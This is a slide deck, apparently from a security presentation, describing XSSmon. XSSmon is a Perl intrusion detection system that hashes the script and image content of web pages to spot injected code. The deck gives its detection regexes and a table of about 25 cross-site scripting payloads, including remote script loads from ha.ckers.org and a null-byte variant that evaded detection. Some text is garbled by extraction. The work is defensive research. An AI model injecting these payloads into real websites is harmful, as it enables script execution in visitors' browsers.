This document describes an XSSmon IDS that uses regular expressions to detect potential cross-site scripting (XSS) attacks by extracting executable content from web pages and computing SHA-1 hashes. It was tested on web pages with unmodified, modified, and malicious content, detecting changes when executable code was added but not when only HTML was added. The IDS successfully detected most XSS attack vectors but not one using a null character. Overall, the proof of concept suggests robust XSS monitoring could help mitigate risks from vulnerabilities.
OWASP ESAPI and Microsoft Web Libraries in Cross-Site Scripting
XSSmon: A Perl Based IDS for the Detection of Potential XSS Attacks
1. XSSmon: A Perl
Based IDS for the
Detection of
Potential XSS
Attacks
Christopher M. Frenz
2. Cross Site Scripting
Cross Site Scripting (XSS) entails the
injection of a malicious script into a Web
site so that when a future user accesses
the Web site, the script is executed by the
browser of the client machine
In OWASP’s 2010 survey of the 10 greatest
application security risks, injection attacks
were ranked #1 and XSS attacks were
ranked as #2
3. Common XSS Defenses
Escaping
Converting < to < to render content contained
in <script></script> tags non-executable
Validation
Whitelisting
(s?(?d{3})?[-s.]?d{3}[-.]d{4})
Blacklisting
((%3C)|<).*?((%3E)|>)
4. Project Goal
Thisstudy does not seek to build on the
existing methods of XSS prevention and
mitigation, but rather seeks to take
advantage of the ability of regular
expressions to detect XSS elements as a
means of developing a XSS intrusion
detection system, in order to allow the
detection of any breached XSS defenses.
5. Hashes
One way
cryptographic
function in which
each input should
yield a unique
output
7. Tripwire
Tripwire works by having the application user
select critical system files and computing a hash of
those system files to establish a baseline
At some future point in time, the hashes of those
selected files can be recomputed
If the file was not modified in any way the hash
value that pertains to the file will remain
unchanged
If a recomputed hash value is found to differ from
the baseline value, it is indicative that the file has
in some way been modified, which could be
indicative of a potential attack on the system
8. XSSmon IDS
This XSS IDS is a variation of the theme laid forth in
tripwire in that it seeks to use regular expressions to
identify all of the possible client side executable
content in a Web page
Script Regex
((<|%3C)(s|%73|%53)(c|%63|%43)(r|%72%5
2)(i|%69|%49)(p|%70|%50)(t|%74%54).*?(<|
%3C)(/|%2F)(s|%73|%53)(c|%63|%43)(r|%72
%52)(i|%69|%49)(p|%70|%50)(t|%74%54)(>|
%3E))
Img Regex
((<|%3C)(i|%69|%49)(m|%6D|%4D)(g|%67|
%47).*?(>|%3E))
9. XSSmon Methods
It is the intention of this application to only recognize
potentially executable content, so that “harmless”
content, such as plain non-executable text enclosed
in <p> tags and the like, do not trigger the system
every time they are added to a page
The IDS can be presented with a list of Web page
links to monitor, and will use the regular expressions to
globally match all of the content encapsulated in a
<script> or <img> tags
All of this content is then concatenated together into
a string that contains all the content recognized as
potentially executable and the string passed through
a SHA1 hash.
10. HTML Page with Executable
Content Potentially
executable
content is
extracted and
used as input
to SHA-1 hash
At a later
point in time
the content
will be re-
extracted and
put through
the hash
function again
11. Test #1
To test the efficacy of the IDS system, three
identical Web pages (XSSTest, XSSTest2, XSSTest3)
are initially created that contain a mixture of
standard HTML tags and a simple JavaScript that
displays the current date in the browser window
These html pages are then uploaded to Apache
Web server and the corresponding links input into
the XSS IDS program
The XSS IDS baseline module is then used to
compute the SHA1 hash values of the executable
content in the Web page present at each link
12. Test1: Initial Hash Values
The three
identical
Web pages
yield
identical
hash values
13. Test 1 Continued
The 3 HTML files will be modified as follows:
the XSSTest.html file will have additional
executable content added to it
the XSSTest2.html file will have additional html
content added to it, but no additional client side
executable content added
XSSTest3.html will remain unmodified as a control
After the files are modified (as above) the module
of the XSS IDS application that recomputes the
hashes and performs comparisons to the values
stored in the database will be executed
15. Test 1 Conclusions
The Web page with additional executable
content was detected
Those without additional executable content
did not trigger the IDS
This would make the IDS useful for any type of
Web forum or Web site that allows the posting
of comments or other user content, since the
IDS would not trigger false alarms for every
addition to a Web page; only additions that
match the potentially executable content
patterns laid forth in the applications regular
expressions
16. Test 2
The IDS was then further tested by
determining how well it picks up a large
variety of XSS attack vectors
Each of these attack vectors was inserted
into an html Web page whose baseline
value had been previously computed
After the insertion, the hashes were
recomputed and compared to the
baseline values
17. Det
XSS Attack Vector ecte
d
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> Yes
<IMG SRC="javascript:alert('XSS');"> Yes
<img SRC=javascript:alert('jXSS')> Yes
<IMG SRC=JaVaScRiPt:alert('XSS')> Yes
<IMG SRC=javascript:alert("XSS")> Yes
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`> Yes
<IMG """><SCRIPT>alert("XSS")</SCRIPT>"> Yes
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> Yes
<IMG
SRC=javascript:alert('X Yes
SS')>
<IMG
SRC=javascript:
Yes
alert('XSS'�
00041>
<IMG
SRC=javascript:alert('X Yes
3S')>
<IMG SRC="jav ascript:alert('XSS');"> Yes
<IMG SRC="jav	ascript:alert('XSS');"> Yes
<IMG SRC="jav
ascript:alert('XSS');"> Yes
<IMG SRC="jav
ascript:alert('XSS');"> Yes
<IMG SRC="javascript:alert('XSS');"> - Each character on a new line Yes
perl -e 'print "<IMG SRC=java0script:alert("XSS")>";' > out Yes
perl -e 'print "<SCR0IPT>alert("XSS")</SCR0IPT>";' > out No
<IMG SRC="  javascript:alert('XSS');"> Yes
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> Yes
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT> Yes
<<SCRIPT>alert("XSS");//<</SCRIPT> Yes
<SCRIPT SRC=http://ha.ckers.org/xss.js?<B>
<SCRIPT SRC=//ha.ckers.org/.j> Yes
<IMG SRC="javascript:alert('XSS')" Yes
<SCRIPT>a=/XSS/
Yes
alert(a.source)</SCRIPT>
</TITLE><SCRIPT>alert("XSS");</SCRIPT> Yes
18. Test 2 Conclusions
Inall but one case the hash values for the
html pages changed, demonstrating the
efficacy of the IDS against detecting XSS
attacks
The one XSS attack vector that went
undetected contained a null character
(0) in the script tag which made the tag
unrecognizable to the IDS
19. Overall Conclusion
While the XSS IDS presented in this manuscript is still at a
stage where much more rigorous testing needs to be
applied to it to see how well it detects XSS attacks
against the breadth of all possible XSS attacks on a
diversity of different Web pages, the proof of concept
presented here is strongly suggestive that the creation
of a XSS IDS is entirely feasible. Moreover, a robust XSS
IDS would an excellent tool for Web application security,
because no matter how securely written a piece of
software bugs will still exist in it. An IDS such as this can
help to mitigate the potential damage that could be
unleashed by a bit of malicious XSS code slipping the a
Web application’s input validation and escaping
defenses by providing an early warning that such a
condition exists.